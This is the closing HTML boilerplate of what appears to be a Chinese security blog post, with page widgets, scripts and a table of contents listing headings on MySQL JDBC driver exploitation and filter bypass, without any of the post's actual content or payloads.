            <i class="fa-solid fa-expand"></i>
        </li>
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container border-box ">
    <ul class="side-tools-list side-tools-show-handle border-box">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <!-- toggle mode -->
        
            <li class="tools-item tool-toggle-theme-mode flex-center">
                <i class="fas fa-moon"></i>
            </li>
        

        <!-- rss -->
        

        <!-- to bottom -->
        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list border-box">
        
            <li class="tools-item toggle-show-toc-tablet flex-center">
                <i class="fas fa-list"></i>
            </li>
        

        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        <li class="tools-item tool-scroll-to-top flex-center show-arrow">
            <i class="arrow fas fa-arrow-up"></i>
            <span class="percent"></span>
        </li>
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

    <!-- tablet toc -->
    
        <div class="tablet-post-toc-mask">
            <div class="tablet-post-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%8D%E5%87%BA%E7%BD%91%E6%89%93%E6%B3%95"><span class="nav-number">1.</span> <span class="nav-text">不出网打法</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8E%9F%E7%90%86%E6%A6%82%E8%BF%B0"><span class="nav-number">1.1.</span> <span class="nav-text">原理概述</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#pcap%E6%AD%A3%E5%B8%B8%E7%94%9F%E6%88%90"><span class="nav-number">1.2.</span> <span class="nav-text">pcap正常生成</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%B8%A9%E5%9D%91%E8%AE%B0%E5%BD%95"><span class="nav-number">1.3.</span> <span class="nav-text">踩坑记录</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%81%97%E7%95%99%E9%97%AE%E9%A2%98"><span class="nav-number">1.4.</span> <span class="nav-text">遗留问题</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%87%BA%E7%BD%91%E6%89%93%E6%B3%95"><span class="nav-number">2.</span> <span class="nav-text">出网打法</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Exp"><span class="nav-number">2.1.</span> <span class="nav-text">Exp</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8E%9F%E7%90%86"><span class="nav-number">2.2.</span> <span class="nav-text">原理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%93%BE%E5%AD%90"><span class="nav-number">2.3.</span> <span class="nav-text">链子</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BC%96%E5%86%99fakeServer"><span class="nav-number">2.4.</span> <span class="nav-text">编写fakeServer</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%B0%83%E8%AF%95"><span class="nav-number">2.5.</span> <span class="nav-text">调试</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%8D%E5%90%8C%E7%89%88%E6%9C%ACmysqlDriver%E7%9A%84payload"><span class="nav-number">2.6.</span> <span class="nav-text">不同版本mysqlDriver的payload</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#8-x"><span class="nav-number">2.6.1.</span> <span class="nav-text">8.x</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-x"><span class="nav-number">2.6.2.</span> <span class="nav-text">6.x</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-1-29-5-1-40"><span class="nav-number">2.6.3.</span> <span class="nav-text">5.1.29-5.1.40</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-1-19-5-1-28"><span class="nav-number">2.6.4.</span> <span class="nav-text">5.1.19-5.1.28</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-1-11"><span class="nav-number">2.6.5.</span> <span class="nav-text">&gt;&#x3D;5.1.11</span></a></li><li class="nav-item nav-level-3"><a class="nav-link"><span class="nav-number">2.6.6.</span> <span class="nav-text">&lt;&#x3D;5.1.10</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E6%8A%80%E5%B7%A7"><span class="nav-number">3.</span> <span class="nav-text">绕过技巧</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">3.1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%B3%A8%E6%84%8F%E4%BA%8B%E9%A1%B9"><span class="nav-number">3.2.</span> <span class="nav-text">注意事项</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B3%A8%E9%87%8A%E7%AC%A6%E5%B7%AE%E5%BC%82"><span class="nav-number">3.2.1.</span> <span class="nav-text">注释符差异</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%82%E6%95%B0%E5%90%8D%E5%92%8C%E5%8F%82%E6%95%B0%E5%80%BC%E8%A7%A3%E6%9E%90%E5%B7%AE%E5%BC%82"><span class="nav-number">3.2.2.</span> <span class="nav-text">参数名和参数值解析差异</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%86%E6%9E%90"><span class="nav-number">3.3.</span> <span class="nav-text">分析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A4%A7%E5%B0%8F%E5%86%99%E7%BB%95%E8%BF%87"><span class="nav-number">3.3.1.</span> <span class="nav-text">大小写绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#URL%E7%BC%96%E7%A0%81"><span class="nav-number">3.3.2.</span> <span class="nav-text">URL编码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%82%E6%95%B0%E6%8B%BC%E6%8E%A5"><span class="nav-number">3.3.3.</span> <span class="nav-text">参数拼接</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#address%E7%BB%95%E8%BF%87"><span class="nav-number">3.3.4.</span> <span class="nav-text">address绕过</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%82%E8%80%83"><span class="nav-number">3.4.</span> <span class="nav-text">参考</span></a></li></ol></li></ol>
    </div>
</div>

            </div>
        </div>
    
</main>





<!-- common js -->

<script src="/js/utils.js"></script>

<script src="/js/header-shrink.js"></script>

<script src="/js/back2top.js"></script>

<script src="/js/toggle-theme.js"></script>

<script src="/js/code-block.js"></script>

<script src="/js/main.js"></script>

<script src="/js/libs/anime.min.js"></script>


<!-- local search -->

    
<script src="/js/local-search.js"></script>



<!-- lazyload -->


<div class="pjax">
    <!-- home page -->
    

    <!-- post page -->
    
        <!-- post-helper -->
        
<script src="/js/post/post-helper.js"></script>


        <!-- toc -->
        
            
<script src="/js/post/toc.js"></script>

        

        <!-- copyright-info -->
        
            
<script src="/js/post/copyright-info.js"></script>

        

        <!-- share -->
        
    

    <!-- categories page -->
    

    <!-- links page -->
    

    <!-- photos page -->
    

    <!-- tools page -->
    
</div>

<!-- mermaid -->


<!-- pjax -->

    
<script src="/js/libs/pjax.min.js"></script>

<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax'
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
        });

        document.addEventListener('pjax:send', () => {
            KEEP.utils.pjaxProgressBarStart()
        });

        document.addEventListener('pjax:complete', () => {
            KEEP.utils.pjaxProgressBarEnd()
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'))
            KEEP.initExecute()
        });
    });
</script>




</body>
</html>
